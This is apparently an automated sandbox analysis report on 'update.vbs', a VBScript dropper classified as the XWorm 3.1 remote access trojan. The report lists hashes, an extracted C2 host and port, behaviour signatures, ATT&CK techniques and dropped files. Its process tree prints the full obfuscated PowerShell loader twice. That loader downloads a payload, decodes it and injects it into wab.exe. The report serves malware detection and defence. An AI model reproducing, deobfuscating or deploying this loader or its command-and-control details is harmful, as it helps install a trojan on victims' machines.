Overview

overview

10

Static

static

1

update.vbs

windows7-x64

10

update.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 16:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    update.vbs

  • Size

    896KB

  • MD5

    5166cecef029d7b9392a1bc345639747

  • SHA1

    abed1e58d8b9633ccab51ddd5c18994cc8183bc8

  • SHA256

    b7e3ed8add4ed1f4d78dd45fd97486240585c79ebb5f636949d0e2e62f3b6e14

  • SHA512

    a07a6c9978f1c0f143413073440763d8f144aa645568b7a82811d398fa089427135238beca0a6d410ce11720c4b12bd594284644a5a7b44c0601ef5a2a5b1488

  • SSDEEP

    12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9dU:UXh+k+taGKqoJOdU

Score
10/10
xwormrattrojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

xgmn934.duckdns.org:8896

Mutex

2utLZrxcByvppTdF

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\update.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Flaccid = 1;$Santalales='Sub';$Santalales+='strin';$Santalales+='g';Function Semiflexion($Telefoniens){$Vespertine=$Telefoniens.Length-$Flaccid;For($fosterer=5;$fosterer -lt $Vespertine;$fosterer+=6){$Smudslitteraturs+=$Telefoniens.$Santalales.Invoke( $fosterer, $Flaccid);}$Smudslitteraturs;}function Underlydsflyets($Lao){. ($Licentiatgradernes) ($Lao);}$Vastities=Semiflexion ' ,imbMDertioPre dzBolvribuybalLimo,lUnvapaPhilo/Nonso5Smals.Forld0ga.lt Forfr( Fo.kW BrddiTyskfnVaccidakkvio.fskewAf,lasHy.ek AfbrkNSemirTFusco t,nde1 Tj,n0Rets .Nevad0Triss;progr EndazWCensoiSpgern Fe r6Uterl4Ut ke; Bevi UnsplxSlave6Ov.re4Pinol;Overr Acenr Ul.rvArbit:Unrot1R.tsf2uhr,i1K,der.Ag.ra0Colpo)Alk l DyrskGTvan eProffcMiscokLykkeo Dagl/ Gran2F,dno0 Skri1 Fals0Mohi 0ansg,1 kl.r0Nyans1Cuta, roed FP,rapi SperrSyst,e aphafStriboOv rax Haze/Nehil1 Cist2 Fors1Polit.Motio0Outea ';$Blenders=Semiflexion 'FredsUOt.cosPresee orrdrGerma-navleAUproogP,sole SammnLeylatIm,re ';$Fjernsyn=Semiflexion 'Mandsh Apprt UdkotSkrifp rgotsForsg: Prec/Virk,/Seam,wTsuchw ByrawSuper.Ebulls Se.ieUnretnBudcedRamadsNondep U.tiaGarvecF,ikaeObtru.Starcc erejo OvermNonpr/gl,ciphydr.rGarceo Stut/Ti.dedKoncelElekt/Opsti3 Tv,faTrim.9ArealxSavlejPtery1 G.ng ';$blokbogstaverne=Semiflexion 'Geocr>Dr,je ';$Licentiatgradernes=Semiflexion 'Pilimi .artem,llixSic l ';$Unsmiled='Opslagsvrkerne';$Besodden = Semiflexion 'Afskye AlogcInelih latioIne p Betin%Olmfua Gud,pnonc,pIn bid Litoa Prott FletaIndsk%Ximen\ olymGEtvrea SubtlAnklagExposeScrapn Cont1Gia t6Forud5Sland. ,ornKRealin forei .ell K,ops&Ganoc& Spaq JerikeAut,mcTungehLaantoDeesk Ars.t H ml ';Underlydsflyets (Semiflexion ',isse$blomkgMaanel Ur.doMedarbOverlaMu tilAzobe:LanarD Prinu Aueta Venil,ishaaWinge=Elli,(C.rboc GamomLowrad eocl Ele t/ PickcKotwa Udsmi$.ruppBmaaleeClavisAalano oveddBetakd Acr.eMinern Svin)Provo ');Underlydsflyets (Semiflexion ' Upgr$T ivlgLi,ocl Plato tribbBesina No.slMarsk:Non.lMCompueentertHjernaSide.dInferoUnco,n Pla.b Unmoe T,reh Udhua TeasnAutoxdMagislSamoriTriconAlf,dg,eran= Gaze$AlkalFMagnejDigtnePolakrGenern DepusKhu kyNedlanI,bre.Subdasa.aphpNonprlsammeiv nhet,olig(Pr in$Hom,db DommlAntihoHom bkValgdb MaltoAethegProlisSli gttumoraY,cksv Ud pestorkr FarvnTrileeFin,v)Wrest ');$Fjernsyn=$Metadonbehandling[0];$Toiletspejles= (Semiflexion 'Tooth$ Skoeg Retsl Mesooha bnb AalhaPrustl roug:Elefat G.iqiStenbtNatiorKrysge QuilrFor.aasirplnR visnRevolaJeesmlA.tenyTrffes Zoope.hapsrOverp=Lans,N Kri.eLitt.wHvoro-ByggeOTouribInterj Ha,sePapirc f,gotoscar Pan,SProfayAftrdssuti,tUnjaueSammem Aron.Ret aNBleedeRentetB gca.IgangWLidiseBish bImplaCOpti lEndosiReclae Taxin De,at');$Toiletspejles+=$Duala[1];Underlydsflyets ($Toiletspejles);Underlydsflyets (Semiflexion ' arag$Befstt dommiS,ciatSmederStopheDisvorDownlaVo.epnTrekanRigoraInterlEn ety Diffs Un eeSl.vir N,il.ParalHSalpieselekaMod.rdAconieForrarRyttes Lykk[Genet$Deo.yBHyraxlFr.nte Silvnb edydOmkl e Brokr.ngansKoola]Ex.um=Guddo$UdskrV Ch eaInexpsPolyst.enotiIndf t ClitiIn.oge DescsRattl ');$Amatrarkologers=Semiflexion ' Un,a$LyknstSkewni vel.tTeachr,ramme,ibekrCher,aHolomn Palan,nsupaTriollUn,enySome sUltraemalnorU,mov.Unde,DSlappoSkor.wRamusnHea slKakemoDep ca ,arad RegnFIndfriImpetlRdg.neEf,er(Skalp$GilbeF Lderj MarteCarairOpr.gnMultisCharmyRadionStruk,Gudhe$ F,itEPrusspHetera.nsecl Lan.pRejseaLgneht Aksge.alav)myofi ';$Epalpate=$Duala[0];Underlydsflyets (Semiflexion 'Karto$,ncepgKa.iulHvileoafkorbAq,edaBeautl hori:VirkeDS apeiEnstav PassiGlatinCivilaPrecob,ageslSchmee.ilic= Radi(pythoThirdse Komps GangtIld,l- OzonPSchisaRaasttJubilhOutec kinn$ SkrlEIn.erpTaxwiaPersol C.enpFrontaMisprtDisbeeJunke)Sem t ');while (!$Divinable) {Underlydsflyets (Semiflexion '.atri$SubergTurnslSpalto KonfbOpistaUnderlDisob:WooleOWhacksRingdt.endee Irren TaagsbisinoProparSvejfiGudetaDkvi.=Engra$ LytttLipidr GraduGum,tePalad ') ;Underlydsflyets $Amatrarkologers;Underlydsflyets (Semiflexion 'UdvlgSB viltcheesaKooter iott.hidd-Kon iS tch.lUnreveTr,eneGironpUninf Tross4Lvovp ');Underlydsflyets (Semiflexion ' Bnds$ParapgFejeklRdha.oCanepbisobaaVerdelChefk: ref,DGangbiExcerv alibi She.n Salma.halebdeadwl ImmaeUnsu,= Bes (RotalT,inameBegaasTrykltRealt-PickePNooklaPrototVaccih .xer Costa$ .alvEC.ntepBas.sa UdgilUncyppKilogaSkattt Downe Unma) Rot, ') ;Underlydsflyets (Semiflexion ',ilsk$R.ntgg Sco.lMundioBenhibN.vlea WurzlRinge: sub.NAllieoUndignB stugHus reYannonAtomfe Chuca PauslForgyoBjrgngRhigoiHep.acEugenaO,fenl Vaar=cyt,t$Rea,tgSaloolAgg eo ncilbPyrogaTitallNajes: DiftL onkrnHeinrgHaan s Sta,eOutsplOntogsIgangfCystouHenfalSangedMandueMilte+Relly+Unmis%S,raf$WickeMSt,deeLowlytMacroaTele,dSi skoShoven Bobeb.runheLevenh.mblya eptnIn uld Al hlRavjyiTrustnRecepgUnpar.HerlicMaitroculliuRacemn GenetRes,n ') ;$Fjernsyn=$Metadonbehandling[$Nongenealogical];}$Groenlandske11=324564;$Kapellaners=29919;Underlydsflyets (Semiflexion 'monro$jarfug An,ilQuizzoHygg b Hov,aIn.rtlNatte:PerceVtel voMe,lomAdvano Whits Refur stud jeppe=Chemi R.cisGSardieBefu.t Dvrg-SkelsCG hngolgesrnAfbart,achye AnstnSlagnt .ras Theo$ omeE StvnpC.ntraLrksgl DefepStiftaArchatAfslaeTuber ');Underlydsflyets (Semiflexion ' Bopl$ddsrigdiaphlCurteo SkaabMotoga.allol,fnde:RecreTDesinePudent atabrMalloahusn,pPottey PelsrO,svbetvan n SjokoOpbe,uRaadgsJumpe msla=Alipi Uddi[poll,SFarfaySynkrs.iloptDestaeNonremDds.t.genneC brawohelminSultev Pn.ue Diffr.orget Tu t]Super:Deve :UltimFSmergrmas.lo Overm K.nnBTrakwaPlan,sTran.epuc,l6H.bac4He.arSInvestVebogrIncori Ild.nCognagLakf.( upma$,etorVUgl,ro be,umBeb.goVortisCatchr nong)Fris, ');Underlydsflyets (Semiflexion 'Ps.ud$EbeltgNetadlSu,laoZygotbKo staCom,elM,rta: .onaLUdmateUndipp W,ofiD beldSpecioFiv,rlHeldaiRdarvt Jvi.eYelp for,l=Withs Welco[Ko diS,tormy Misas,ubbitTjreneT leomParli.SekonTPe,mueFotokxSecultFilms.SkokrE Reinn Pr,acunseaon maudSvmmeiColoqnHarpug Pala],oral:Sunna:He koARefunSKanapCAmbi,ITilsmIOb,en.TraguGsub oeAktivtFun aSDiamatN.ncorIll,siMaikanBarbzgTripe(Unsub$RespaTSo keeMultit.uperrUngenaRtesup ordeyUdsp rRe uce GloonEl,eno .akeu,fbudsKram )Gen,e ');Underlydsflyets (Semiflexion ' Tech$succog yperltautooDistibF.evaaSprudlPillm: AleeSDi,kmaBro hmEnc,mtSttysa Cou.l Bek e g skdNesose un,r=,thal$Fj rnLNuanceMonotp Tilhi PuhsdmedleoBanedl ProgiMarketHa,vle Afbl.KoketsGlocku pseubHobblsUnge,tBl.zorFarmhispi,nnCar igInter(Defle$praliG UkrurinforoDeckheIrvinn Aphtl Re iaPollonMa trdCap.cs OutvkDoloueShrin1C.vil1Tinkt,Dynev$Dor,mKPhonoa EthipHa,sleS,ydelOverclStrata AsthnNiveae ldrer Drais teno)Skrd. ');Underlydsflyets $Samtalede;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Galgen165.Kni && echo t"
        3⤵
          PID:3676
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Flaccid = 1;$Santalales='Sub';$Santalales+='strin';$Santalales+='g';Function Semiflexion($Telefoniens){$Vespertine=$Telefoniens.Length-$Flaccid;For($fosterer=5;$fosterer -lt $Vespertine;$fosterer+=6){$Smudslitteraturs+=$Telefoniens.$Santalales.Invoke( $fosterer, $Flaccid);}$Smudslitteraturs;}function Underlydsflyets($Lao){. ($Licentiatgradernes) ($Lao);}$Vastities=Semiflexion ' ,imbMDertioPre dzBolvribuybalLimo,lUnvapaPhilo/Nonso5Smals.Forld0ga.lt Forfr( Fo.kW BrddiTyskfnVaccidakkvio.fskewAf,lasHy.ek AfbrkNSemirTFusco t,nde1 Tj,n0Rets .Nevad0Triss;progr EndazWCensoiSpgern Fe r6Uterl4Ut ke; Bevi UnsplxSlave6Ov.re4Pinol;Overr Acenr Ul.rvArbit:Unrot1R.tsf2uhr,i1K,der.Ag.ra0Colpo)Alk l DyrskGTvan eProffcMiscokLykkeo Dagl/ Gran2F,dno0 Skri1 Fals0Mohi 0ansg,1 kl.r0Nyans1Cuta, roed FP,rapi SperrSyst,e aphafStriboOv rax Haze/Nehil1 Cist2 Fors1Polit.Motio0Outea ';$Blenders=Semiflexion 'FredsUOt.cosPresee orrdrGerma-navleAUproogP,sole SammnLeylatIm,re ';$Fjernsyn=Semiflexion 'Mandsh Apprt UdkotSkrifp rgotsForsg: Prec/Virk,/Seam,wTsuchw ByrawSuper.Ebulls Se.ieUnretnBudcedRamadsNondep U.tiaGarvecF,ikaeObtru.Starcc erejo OvermNonpr/gl,ciphydr.rGarceo Stut/Ti.dedKoncelElekt/Opsti3 Tv,faTrim.9ArealxSavlejPtery1 G.ng ';$blokbogstaverne=Semiflexion 'Geocr>Dr,je ';$Licentiatgradernes=Semiflexion 'Pilimi .artem,llixSic l ';$Unsmiled='Opslagsvrkerne';$Besodden = Semiflexion 'Afskye AlogcInelih latioIne p Betin%Olmfua Gud,pnonc,pIn bid Litoa Prott FletaIndsk%Ximen\ olymGEtvrea SubtlAnklagExposeScrapn Cont1Gia t6Forud5Sland. ,ornKRealin forei .ell K,ops&Ganoc& Spaq JerikeAut,mcTungehLaantoDeesk Ars.t H ml ';Underlydsflyets (Semiflexion ',isse$blomkgMaanel Ur.doMedarbOverlaMu tilAzobe:LanarD Prinu Aueta Venil,ishaaWinge=Elli,(C.rboc GamomLowrad eocl Ele t/ PickcKotwa Udsmi$.ruppBmaaleeClavisAalano oveddBetakd Acr.eMinern Svin)Provo ');Underlydsflyets (Semiflexion ' Upgr$T ivlgLi,ocl Plato tribbBesina No.slMarsk:Non.lMCompueentertHjernaSide.dInferoUnco,n Pla.b Unmoe T,reh Udhua TeasnAutoxdMagislSamoriTriconAlf,dg,eran= Gaze$AlkalFMagnejDigtnePolakrGenern DepusKhu kyNedlanI,bre.Subdasa.aphpNonprlsammeiv nhet,olig(Pr in$Hom,db DommlAntihoHom bkValgdb MaltoAethegProlisSli gttumoraY,cksv Ud pestorkr FarvnTrileeFin,v)Wrest ');$Fjernsyn=$Metadonbehandling[0];$Toiletspejles= (Semiflexion 'Tooth$ Skoeg Retsl Mesooha bnb AalhaPrustl roug:Elefat G.iqiStenbtNatiorKrysge QuilrFor.aasirplnR visnRevolaJeesmlA.tenyTrffes Zoope.hapsrOverp=Lans,N Kri.eLitt.wHvoro-ByggeOTouribInterj Ha,sePapirc f,gotoscar Pan,SProfayAftrdssuti,tUnjaueSammem Aron.Ret aNBleedeRentetB gca.IgangWLidiseBish bImplaCOpti lEndosiReclae Taxin De,at');$Toiletspejles+=$Duala[1];Underlydsflyets ($Toiletspejles);Underlydsflyets (Semiflexion ' arag$Befstt dommiS,ciatSmederStopheDisvorDownlaVo.epnTrekanRigoraInterlEn ety Diffs Un eeSl.vir N,il.ParalHSalpieselekaMod.rdAconieForrarRyttes Lykk[Genet$Deo.yBHyraxlFr.nte Silvnb edydOmkl e Brokr.ngansKoola]Ex.um=Guddo$UdskrV Ch eaInexpsPolyst.enotiIndf t ClitiIn.oge DescsRattl ');$Amatrarkologers=Semiflexion ' Un,a$LyknstSkewni vel.tTeachr,ramme,ibekrCher,aHolomn Palan,nsupaTriollUn,enySome sUltraemalnorU,mov.Unde,DSlappoSkor.wRamusnHea slKakemoDep ca ,arad RegnFIndfriImpetlRdg.neEf,er(Skalp$GilbeF Lderj MarteCarairOpr.gnMultisCharmyRadionStruk,Gudhe$ F,itEPrusspHetera.nsecl Lan.pRejseaLgneht Aksge.alav)myofi ';$Epalpate=$Duala[0];Underlydsflyets (Semiflexion 'Karto$,ncepgKa.iulHvileoafkorbAq,edaBeautl hori:VirkeDS apeiEnstav PassiGlatinCivilaPrecob,ageslSchmee.ilic= Radi(pythoThirdse Komps GangtIld,l- OzonPSchisaRaasttJubilhOutec kinn$ SkrlEIn.erpTaxwiaPersol C.enpFrontaMisprtDisbeeJunke)Sem t ');while (!$Divinable) {Underlydsflyets (Semiflexion '.atri$SubergTurnslSpalto KonfbOpistaUnderlDisob:WooleOWhacksRingdt.endee Irren TaagsbisinoProparSvejfiGudetaDkvi.=Engra$ LytttLipidr GraduGum,tePalad ') ;Underlydsflyets $Amatrarkologers;Underlydsflyets (Semiflexion 'UdvlgSB viltcheesaKooter iott.hidd-Kon iS tch.lUnreveTr,eneGironpUninf Tross4Lvovp ');Underlydsflyets (Semiflexion ' Bnds$ParapgFejeklRdha.oCanepbisobaaVerdelChefk: ref,DGangbiExcerv alibi She.n Salma.halebdeadwl ImmaeUnsu,= Bes (RotalT,inameBegaasTrykltRealt-PickePNooklaPrototVaccih .xer Costa$ .alvEC.ntepBas.sa UdgilUncyppKilogaSkattt Downe Unma) Rot, ') ;Underlydsflyets (Semiflexion ',ilsk$R.ntgg Sco.lMundioBenhibN.vlea WurzlRinge: sub.NAllieoUndignB stugHus reYannonAtomfe Chuca PauslForgyoBjrgngRhigoiHep.acEugenaO,fenl Vaar=cyt,t$Rea,tgSaloolAgg eo ncilbPyrogaTitallNajes: DiftL onkrnHeinrgHaan s Sta,eOutsplOntogsIgangfCystouHenfalSangedMandueMilte+Relly+Unmis%S,raf$WickeMSt,deeLowlytMacroaTele,dSi skoShoven Bobeb.runheLevenh.mblya eptnIn uld Al hlRavjyiTrustnRecepgUnpar.HerlicMaitroculliuRacemn GenetRes,n ') ;$Fjernsyn=$Metadonbehandling[$Nongenealogical];}$Groenlandske11=324564;$Kapellaners=29919;Underlydsflyets (Semiflexion 'monro$jarfug An,ilQuizzoHygg b Hov,aIn.rtlNatte:PerceVtel voMe,lomAdvano Whits Refur stud jeppe=Chemi R.cisGSardieBefu.t Dvrg-SkelsCG hngolgesrnAfbart,achye AnstnSlagnt .ras Theo$ omeE StvnpC.ntraLrksgl DefepStiftaArchatAfslaeTuber ');Underlydsflyets (Semiflexion ' Bopl$ddsrigdiaphlCurteo SkaabMotoga.allol,fnde:RecreTDesinePudent atabrMalloahusn,pPottey PelsrO,svbetvan n SjokoOpbe,uRaadgsJumpe msla=Alipi Uddi[poll,SFarfaySynkrs.iloptDestaeNonremDds.t.genneC brawohelminSultev Pn.ue Diffr.orget Tu t]Super:Deve :UltimFSmergrmas.lo Overm K.nnBTrakwaPlan,sTran.epuc,l6H.bac4He.arSInvestVebogrIncori Ild.nCognagLakf.( upma$,etorVUgl,ro be,umBeb.goVortisCatchr nong)Fris, ');Underlydsflyets (Semiflexion 'Ps.ud$EbeltgNetadlSu,laoZygotbKo staCom,elM,rta: .onaLUdmateUndipp W,ofiD beldSpecioFiv,rlHeldaiRdarvt Jvi.eYelp for,l=Withs Welco[Ko diS,tormy Misas,ubbitTjreneT leomParli.SekonTPe,mueFotokxSecultFilms.SkokrE Reinn Pr,acunseaon maudSvmmeiColoqnHarpug Pala],oral:Sunna:He koARefunSKanapCAmbi,ITilsmIOb,en.TraguGsub oeAktivtFun aSDiamatN.ncorIll,siMaikanBarbzgTripe(Unsub$RespaTSo keeMultit.uperrUngenaRtesup ordeyUdsp rRe uce GloonEl,eno .akeu,fbudsKram )Gen,e ');Underlydsflyets (Semiflexion ' Tech$succog yperltautooDistibF.evaaSprudlPillm: AleeSDi,kmaBro hmEnc,mtSttysa Cou.l Bek e g skdNesose un,r=,thal$Fj rnLNuanceMonotp Tilhi PuhsdmedleoBanedl ProgiMarketHa,vle Afbl.KoketsGlocku pseubHobblsUnge,tBl.zorFarmhispi,nnCar igInter(Defle$praliG UkrurinforoDeckheIrvinn Aphtl Re iaPollonMa trdCap.cs OutvkDoloueShrin1C.vil1Tinkt,Dynev$Dor,mKPhonoa EthipHa,sleS,ydelOverclStrata AsthnNiveae ldrer Drais teno)Skrd. ');Underlydsflyets $Samtalede;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3920
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Galgen165.Kni && echo t"
            4⤵
              PID:4960
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:5084

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hc3brlca.r0i.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Galgen165.Kni
        Filesize

        461KB

        MD5

        e79b05a84404e4211ead4b26ce7b4817

        SHA1

        f863917c2638ee1f6764346e1d44c7b4bf093e7e

        SHA256

        0cc9ec208c0bc0870bc99bc36f5130b3c31228438ef9df91f88b26008d56c1ff

        SHA512

        c9d1d5b2c546fc5285a59aab759ec70050ecb58fedb94dd494c9eae3384f6e53eb495608a961ce8f79f74c10d35fe9e5dad5ca35e16ae4764fc18f797df955a3

        Download Submit
      • memory/1240-1-0x0000028AA2880000-0x0000028AA28A2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1240-11-0x00007FFA8CD50000-0x00007FFA8D811000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1240-12-0x00007FFA8CD50000-0x00007FFA8D811000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1240-68-0x00007FFA8CD50000-0x00007FFA8D811000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1240-46-0x00007FFA8CD50000-0x00007FFA8D811000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1240-0-0x00007FFA8CD53000-0x00007FFA8CD55000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1240-45-0x00007FFA8CD53000-0x00007FFA8CD55000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3920-23-0x0000000004D10000-0x0000000004D32000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3920-25-0x0000000005650000-0x00000000056B6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3920-36-0x0000000005CD0000-0x0000000005CEE000-memory.dmp
        Filesize

        120KB

        Download
      • memory/3920-37-0x0000000005CF0000-0x0000000005D3C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/3920-38-0x0000000007530000-0x0000000007BAA000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/3920-39-0x0000000006240000-0x000000000625A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/3920-40-0x0000000006F70000-0x0000000007006000-memory.dmp
        Filesize

        600KB

        Download
      • memory/3920-41-0x0000000006F00000-0x0000000006F22000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3920-42-0x0000000008160000-0x0000000008704000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/3920-35-0x00000000056C0000-0x0000000005A14000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/3920-44-0x0000000008710000-0x000000000B53C000-memory.dmp
        Filesize

        46.2MB

        Download
      • memory/3920-24-0x00000000055E0000-0x0000000005646000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3920-22-0x0000000004E40000-0x0000000005468000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/3920-21-0x00000000023D0000-0x0000000002406000-memory.dmp
        Filesize

        216KB

        Download
      • memory/5084-65-0x0000000022D80000-0x0000000022E1C000-memory.dmp
        Filesize

        624KB

        Download
      • memory/5084-63-0x0000000000E00000-0x0000000002054000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/5084-64-0x0000000000E00000-0x0000000000E0E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/5084-70-0x0000000023120000-0x00000000231B2000-memory.dmp
        Filesize

        584KB

        Download
      • memory/5084-71-0x0000000022FA0000-0x0000000022FAA000-memory.dmp
        Filesize

        40KB

        Download